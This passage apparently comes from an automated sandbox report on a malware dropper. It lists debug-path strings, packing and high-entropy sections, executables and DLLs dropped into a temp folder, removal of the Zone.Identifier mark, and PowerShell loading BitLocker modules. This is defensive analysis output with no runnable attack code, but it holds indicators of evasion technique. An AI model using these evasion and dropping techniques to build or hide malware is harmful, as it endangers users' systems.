                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbeH source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdbpEp source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: -C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdbpE source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000002.1815283502.0000000000118000.00000002.00000001.01000000.00000010.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000000.1712134912.0000000000118000.00000002.00000001.01000000.00000010.sdmp, 09xU.exE, 00000026.00000000.1793041267.0000000000748000.00000002.00000001.01000000.00000020.sdmp, 09xU.exE, 00000026.00000002.1956857652.0000000000748000.00000002.00000001.01000000.00000020.sdmp, Mon17e1fac3fd3d84b.exe.1.dr
                  Source: Binary string: em.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BDD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4146627363.0000000000194000.00000004.00000010.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4147052566.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdbL source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr
                  Source: Binary string: C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: ?C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdb source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbtZrq source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3t source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeUnpacked PE file: 24.2.Mon17f45359eb9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeUnpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack .text:ER;.data:W;.tls:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeUnpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeUnpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeUnpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack
                  Source: Mon17948100733a95c58.exe.1.drStatic PE information: 0xCF57F66C [Tue Mar 26 03:13:48 2080 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004014E0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .aspack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5581953
                  Source: setup_installer.exe.0.drStatic PE information: section name: .sxdata
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: section name: [$vdPf#
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: section name:
                  Source: Mon17c604381c7047e.exe.1.drStatic PE information: section name: _RDATA
                  Source: Mon17e1fac3fd3d84b.exe.1.drStatic PE information: section name: .didat
                  Source: setup_install.exe.1.drStatic PE information: section name: /4
                  Source: setup_install.exe.1.drStatic PE information: section name: /14
                  Source: setup_install.exe.1.drStatic PE information: section name: /29
                  Source: setup_install.exe.1.drStatic PE information: section name: /41
                  Source: setup_install.exe.1.drStatic PE information: section name: /55
                  Source: setup_install.exe.1.drStatic PE information: section name: /67
                  Source: setup_install.exe.1.drStatic PE information: section name: /80
                  Source: setup_install.exe.1.drStatic PE information: section name: /91
                  Source: setup_install.exe.1.drStatic PE information: section name: /102
                  Source: libcurl.dll.1.drStatic PE information: section name: /4
                  Source: libcurl.dll.1.drStatic PE information: section name: /14
                  Source: libcurl.dll.1.drStatic PE information: section name: /29
                  Source: libcurl.dll.1.drStatic PE information: section name: /41
                  Source: libcurl.dll.1.drStatic PE information: section name: /55
                  Source: libcurl.dll.1.drStatic PE information: section name: /67
                  Source: libcurl.dll.1.drStatic PE information: section name: /80
                  Source: libcurl.dll.1.drStatic PE information: section name: .aspack
                  Source: libcurl.dll.1.drStatic PE information: section name: .adata
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /4
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /14
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /29
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /41
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /55
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /67
                  Source: libcurlpp.dll.1.drStatic PE information: section name: /80
                  Source: libcurlpp.dll.1.drStatic PE information: section name: .aspack
                  Source: libcurlpp.dll.1.drStatic PE information: section name: .adata
                  Source: libgcc_s_dw2-1.dll.1.drStatic PE information: section name: /4
                  Source: libstdc++-6.dll.1.drStatic PE information: section name: /4
                  Source: libstdc++-6.dll.1.drStatic PE information: section name: .aspack
                  Source: libstdc++-6.dll.1.drStatic PE information: section name: .adata
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_3_01F37DE6 push eax; ret 1_3_01F37DE7
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_3_01F36208 push cs; iretd 1_3_01F3633C
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_3_01F36208 push cs; iretd 1_3_01F3633C
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_3_01F36208 push cs; iretd 1_3_01F3633C
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_3_01F36208 push cs; iretd 1_3_01F3633C
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00414150 push ecx; mov dword ptr [esp], ecx1_2_00414151
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00418D80 push eax; ret 1_2_00418D9E
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00418DB0 push eax; ret 1_2_00418DDE
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0044A019 push eax; mov dword ptr [esp], ebx2_2_0044A02D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004829B0 push eax; mov dword ptr [esp], esi2_2_004983CD
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046808D push eax; mov dword ptr [esp], ebx2_2_004680B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00468089 push eax; mov dword ptr [esp], ebx2_2_004680B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004829B0 push eax; mov dword ptr [esp], esi2_2_004983CD
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004561ED push ecx; mov dword ptr [esp], ebx2_2_00456219
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004561F1 push ecx; mov dword ptr [esp], ebx2_2_00456219
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00454257 push ecx; mov dword ptr [esp], ebx2_2_00454281
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0045425E push ecx; mov dword ptr [esp], ebx2_2_00454281
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046A276 push edx; mov dword ptr [esp], ebx2_2_0046A295
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046A276 push eax; mov dword ptr [esp], ebx2_2_0046A2BF
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046A27A push eax; mov dword ptr [esp], ebx2_2_0046A2BF
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046828D push eax; mov dword ptr [esp], ebx2_2_004682B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00446289 push edx; mov dword ptr [esp], ebx2_2_0044629D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00468289 push eax; mov dword ptr [esp], ebx2_2_004682B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00458353 push eax; mov dword ptr [esp], ebx2_2_00458376
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0045638F push eax; mov dword ptr [esp], ebx2_2_004563A3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046842C push eax; mov dword ptr [esp], ebx2_2_0046843D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004484A3 push edx; mov dword ptr [esp], ebx2_2_004484B7
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004564AC push eax; mov dword ptr [esp], ebx2_2_004564BD
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0046854C push eax; mov dword ptr [esp], ebx2_2_0046855D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043E5A5 push edx; mov dword ptr [esp], ebx2_2_0043E5B9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00466605 push eax; mov dword ptr [esp], ebx2_2_00466619
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: section name: [$vdPf# entropy: 7.993605537305936
                  Source: Mon179e1058f256.exe.1.drStatic PE information: section name: .text entropy: 7.195438472644511
                  Source: Mon17f45359eb9.exe.1.drStatic PE information: section name: .text entropy: 6.9499836708304565
                  Source: libcurl.dll.1.drStatic PE information: section name: .text entropy: 7.9981464299375755
                  Source: libcurlpp.dll.1.drStatic PE information: section name: .text entropy: 7.921841635096203
                  Source: libstdc++-6.dll.1.drStatic PE information: section name: .text entropy: 7.998669633840856
                  Source: Mon1785436ae78.exe.1.drStatic PE information: section name: .text entropy: 7.381763160372711
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\09xU.exEJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bgjifesJump to dropped file
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeFile created: C:\Users\user\AppData\Local\Temp\setup_installer.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\r6f7sE.IJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libgcc_s_dw2-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bgjifesJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\r6f7sE.IJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\bgjifes:Zone.Identifier read attributes | delete
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
